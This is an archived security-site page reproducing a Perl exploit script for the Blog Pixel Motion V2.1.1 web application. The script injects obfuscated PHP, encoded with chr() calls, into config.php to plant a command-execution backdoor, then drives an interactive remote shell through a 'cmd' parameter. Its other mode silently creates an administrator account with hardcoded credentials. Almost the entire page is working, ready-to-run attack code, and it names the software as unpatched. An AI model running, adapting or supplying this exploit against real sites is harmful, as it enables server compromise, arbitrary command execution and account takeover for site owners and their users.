Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Blogs :: b06-4936.htm

Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin Exploit



Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin Exploit
Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin Exploit



#!/usr/bin/perl=0D
#=0D
# Affected.scr..: Blog Pixel Motion V2.1.1=0D
# Poc.ID........: 12060927=0D
# Type..........: PHP Code Execution (stripslashes), SQL Injection (urldecode)=0D
# Risk.level....: High=0D
# Vendor.Status.: Unpatched=0D
# Src.download..: www.pixelmotion.org/zip/blog2.1.zip=0D 
# Poc.link......: acid-root.new.fr/poc/12060927.txt=0D
# Credits.......: DarkFig=0D
#=0D
# print "This exploit is for educational purpose only" x 999; exit;=0D
#=0D
use LWP::UserAgent;=0D
use HTTP::Request::Common;=0D
use HTTP::Response;=0D
use Getopt::Long;=0D
use strict;=0D
=0D
print STDOUT "\n+", '-' x 60, "+\n";=0D
print STDOUT "| Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin |\n";=0D
print STDOUT '+', '-' x 60, "+\n";=0D
=0D
my($host,$path,$proxh,$proxu,$proxp,$choice,$cmd,$res);=0D
my $opt = GetOptions(=0D
   'host=s'   =>  \$host,=0D
   'path=s'   =>  \$path,=0D
   'proxh=s'  =>  \$proxh,=0D
   'proxu=s'  =>  \$proxu,=0D
   'proxp=s'  =>  \$proxp,=0D
   'choice=s' =>  \$choice);=0D
=0D
if(!$host) {=0D
    print STDOUT "|      Usage: ./zz.pl --host=[www] --path=[/] --choice=[0]   |\n";=0D
    print STDOUT "|   [Choice.]  1=PHP_Code_Execution       2=Create_Admin     |\n";=0D
    print STDOUT "|   [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd]      |\n";=0D
    print STDOUT '+', '-' x 60, "+\a\n";=0D
    exit(1);=0D
}=0D
=0D
if($host !~ /http/) {$host = 'http://'.$host;}=0D 
if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}=0D 
if(!$path) {$path = '/';}=0D
if(!$choice) {$choice = 2;}=0D
=0D
my $ua = LWP::UserAgent->new();=0D
   $ua->agent('0xzilla');=0D
   $ua->timeout(30);=0D
   $ua->proxy(['http'] => $proxh) if $proxh;=0D
my $re->proxy_authorization_basic($proxu, $proxp) if $proxp;=0D
=0D
if($choice == 1) {=0D
=0D
   $re = POST $host.$path.'config.php', [=0D
   'nom_blog'  => '";=0D
    $shcode  = chr(0x69).chr(0x66).chr(0x28).chr(0x69).chr(0x73).chr(0x73).chr(0x65);=0D
    $shcode .= chr(0x74).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54);=0D
    $shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D);=0D
    $shcode .= chr(0x29).chr(0x29).chr(0x7B).chr(0x73).chr(0x79).chr(0x73).chr(0x74);=0D
    $shcode .= chr(0x65).chr(0x6D).chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69);=0D
    $shcode .= chr(0x70).chr(0x73).chr(0x6C).chr(0x61).chr(0x73).chr(0x68).chr(0x65);=0D
    $shcode .= chr(0x73).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54);=0D
    $shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D);=0D
    $shcode .= chr(0x29).chr(0x29).chr(0x3B).chr(0x7D).chr(0x0D).chr(0x0A);=0D
    eval($shcode); die(); //'];=0D
    $ua->request($re);=0D
=0D
    while(){=0D
    chomp($cmd = $_);=0D
    if($cmd eq 'exit') { exit(0); }=0D
    $re = GET $host.$path.'include/variables.php?cmd='.$cmd;=0D
    $res = $ua->request($re);=0D
    print STDOUT "\n\n".$res->content."\n\$sh: ";=0D
    }=0D
=0D
=0D
} else {=0D
=0D
  $re = GET $host.$path.'insere_base.php?login=woot&pass=t00w';=0D
  $ua->request($re);=0D
  print STDOUT "[+] Admin login.: woot\n";=0D
  print STDOUT "[+] Admin passwd: t00w\n";=0D
  print STDOUT '+', '-' x 60, "+\n";=0D
=0D
}


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH